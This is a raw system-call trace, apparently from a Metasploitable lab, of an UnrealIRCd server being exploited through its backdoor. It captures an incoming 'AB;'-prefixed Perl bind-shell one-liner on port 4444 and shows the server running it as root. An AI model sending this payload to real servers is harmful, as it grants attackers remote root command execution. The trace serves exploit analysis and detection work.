4519  07:31:16.289694 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 850000})

4519  07:31:16.438948 clock_gettime(CLOCK_MONOTONIC, {2286, 255969102}) = 0

4519  07:31:16.438969 time(NULL)        = 1495625476

4519  07:31:16.438979 time(NULL)        = 1495625476

4519  07:31:16.438991 gettimeofday({1495625476, 438994}, NULL) = 0

4519  07:31:16.439002 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:31:16.439040 clock_gettime(CLOCK_MONOTONIC, {2286, 256053305}) = 0

4519  07:31:16.439050 gettimeofday({1495625476, 439054}, NULL) = 0

4519  07:31:16.439061 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:31:16.439098 clock_gettime(CLOCK_MONOTONIC, {2286, 256111265}) = 0

4519  07:31:16.439109 accept(2, 0, NULL) = 5

4519  07:31:16.439130 getpeername(5, {sa_family=AF_INET, sin_port=htons(40117), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:31:16.439160 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:31:16.439172 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:31:16.439184 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:31:16.439196 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:31:16.439208 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:31:16.439219 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:31:16.439233 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:31:16.439394 clock_gettime(CLOCK_MONOTONIC, {2286, 256429204}) = 0

4519  07:31:16.439432 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:31:16.439449 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:31:16.439476 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:31:16.439489 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:31:16.439503 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:31:16.439524 send(6, ">o\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:31:16.439670 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:31:16.439697 gettimeofday({1495625476, 439702}, NULL) = 0

4519  07:31:16.439713 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:31:16.444899 clock_gettime(CLOCK_MONOTONIC, {2286, 261915964}) = 0

4519  07:31:16.444915 recvfrom(6, ">o\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0]\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:31:16.444988 close(6)          = 0

4519  07:31:16.445003 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:31:16.445031 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:31:16.445140 time(NULL)        = 1495625476

4519  07:31:16.445152 time(NULL)        = 1495625476

4519  07:31:16.445165 gettimeofday({1495625476, 445169}, NULL) = 0

4519  07:31:16.445177 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:31:16.445220 clock_gettime(CLOCK_MONOTONIC, {2286, 262232550}) = 0

4519  07:31:16.445230 gettimeofday({1495625476, 445233}, NULL) = 0

4519  07:31:16.445240 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 740000})

4519  07:31:16.697801 clock_gettime(CLOCK_MONOTONIC, {2286, 514820933}) = 0

4519  07:31:16.697821 recv(9, "PRIVMSG  #testit3 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45

4519  07:31:16.697845 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697865 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697879 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697893 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697906 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697929 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697943 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697956 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697969 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697983 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.697995 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698009 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698022 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698035 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698048 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698061 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698074 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698087 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698100 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698114 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698127 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698140 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:31:16.698171 gettimeofday({1495625476, 698176}, NULL) = 0

4519  07:31:16.698210 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:31:16.698285 clock_gettime(CLOCK_MONOTONIC, {2286, 515298011}) = 0

4519  07:31:16.698297 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:31:16.698325 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:31:16.698348 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:31:16.698360 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:31:16.698374 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10082

10082 07:31:16.698454 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10082 07:31:16.698468 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10082 07:31:16.698478 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10082 07:31:16.698491 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10082 07:31:16.698596 brk(0)            = 0x80f9000

10082 07:31:16.698617 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10082 07:31:16.698634 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f26000

10082 07:31:16.698662 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10082 07:31:16.698709 open("/etc/ld.so.cache", O_RDONLY) = 1

10082 07:31:16.698736 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10082 07:31:16.698755 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f1e000

10082 07:31:16.698765 close(1)          = 0

10082 07:31:16.698776 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10082 07:31:16.698791 open("/lib/libncurses.so.5", O_RDONLY) = 1

10082 07:31:16.698818 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10082 07:31:16.698914 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10082 07:31:16.698931 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eee000

10082 07:31:16.698943 mmap2(0xb7f1b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f1b000

10082 07:31:16.698960 close(1)          = 0

10082 07:31:16.698971 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10082 07:31:16.698985 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10082 07:31:16.698998 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10082 07:31:16.699086 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10082 07:31:16.699102 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eea000

10082 07:31:16.699113 mmap2(0xb7eec000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7eec000

10082 07:31:16.699129 close(1)          = 0

10082 07:31:16.699139 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10082 07:31:16.699164 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10082 07:31:16.699204 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10082 07:31:16.699311 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10082 07:31:16.699341 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ee9000

10082 07:31:16.699355 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d9a000

10082 07:31:16.699366 mmap2(0xb7ee3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ee3000

10082 07:31:16.699380 mmap2(0xb7ee6000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee6000

10082 07:31:16.699394 close(1)          = 0

10082 07:31:16.699416 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d99000

10082 07:31:16.699427 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d996b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10082 07:31:16.699482 mprotect(0xb7ee3000, 4096, PROT_READ) = 0

10082 07:31:16.699518 munmap(0xb7f1e000, 29913) = 0

10082 07:31:16.699543 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10082 07:31:16.699557 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10082 07:31:16.699576 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8d0290) = -1 ENOTTY (Inappropriate ioctl for device)

10082 07:31:16.699605 brk(0)            = 0x80f9000

10082 07:31:16.699614 brk(0x80fa000)    = 0x80fa000

10082 07:31:16.699626 brk(0x80fb000)    = 0x80fb000

10082 07:31:16.699642 getuid32()        = 0

10082 07:31:16.699662 getgid32()        = 0

10082 07:31:16.699672 geteuid32()       = 0

10082 07:31:16.699707 getegid32()       = 0

10082 07:31:16.699738 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10082 07:31:16.699752 time(NULL)        = 1495625476

10082 07:31:16.699764 brk(0x80fc000)    = 0x80fc000

10082 07:31:16.699778 brk(0x80fd000)    = 0x80fd000

10082 07:31:16.699797 open("/proc/meminfo", O_RDONLY) = 1

10082 07:31:16.699818 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10082 07:31:16.699836 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f25000

10082 07:31:16.699847 read(1, "MemTotal:      1035240 kB\nMemFree:        432744 kB\nBuffers:         75488 kB\nCached:         367916 kB\nSwapCached:          0 kB\nActive:         256160 kB\nInactive:       316172 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        432504 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4588 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            18884 kB\nSReclaimable:    10360 kB\nSUnreclaim:       8524 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10082 07:31:16.699929 close(1)          = 0

10082 07:31:16.699940 munmap(0xb7f25000, 4096) = 0

10082 07:31:16.699952 brk(0x80fe000)    = 0x80fe000

10082 07:31:16.699977 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10082 07:31:16.699990 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10082 07:31:16.700002 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10082 07:31:16.700013 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10082 07:31:16.700025 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10082 07:31:16.700036 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10082 07:31:16.700049 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10082 07:31:16.700060 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10082 07:31:16.700073 uname({sys="Linux", node="metasploitable", ...}) = 0

10082 07:31:16.700122 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10082 07:31:16.700140 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10082 07:31:16.700144 brk(0x8100000)    = 0x8100000

10082 07:31:16.700144 getcwd("/etc/unreal", 4096) = 12

10082 07:31:16.700144 getpid()          = 10082

10082 07:31:16.700183 getppid()         = 4519

10082 07:31:16.700198 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10082 07:31:16.700218 stat64("/sbin/sh", 0xbf8d0268) = -1 ENOENT (No such file or directory)

10082 07:31:16.700230 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10082 07:31:16.700246 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10082 07:31:16.700269 socket(PF_FILE, SOCK_STREAM, 0) = 1

10082 07:31:16.700282 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10082 07:31:16.700294 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10082 07:31:16.700315 close(1)          = 0

10082 07:31:16.700327 socket(PF_FILE, SOCK_STREAM, 0) = 1

10082 07:31:16.700336 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10082 07:31:16.700346 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10082 07:31:16.700364 close(1)          = 0

10082 07:31:16.700377 open("/etc/nsswitch.conf", O_RDONLY) = 1

10082 07:31:16.700391 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10082 07:31:16.700406 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f25000

10082 07:31:16.700417 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10082 07:31:16.700464 read(1, "", 4096) = 0

10082 07:31:16.700486 close(1)          = 0

10082 07:31:16.700497 munmap(0xb7f25000, 4096) = 0

10082 07:31:16.700543 open("/etc/ld.so.cache", O_RDONLY) = 1

10082 07:31:16.700570 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10082 07:31:16.700604 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f1e000

10082 07:31:16.700614 close(1)          = 0

10082 07:31:16.700624 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10082 07:31:16.700639 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10082 07:31:16.700667 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10082 07:31:16.700753 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10082 07:31:16.700770 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d90000

10082 07:31:16.700781 mmap2(0xb7d97000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d97000

10082 07:31:16.700802 close(1)          = 0

10082 07:31:16.700813 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10082 07:31:16.700826 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10082 07:31:16.700839 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10082 07:31:16.700923 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

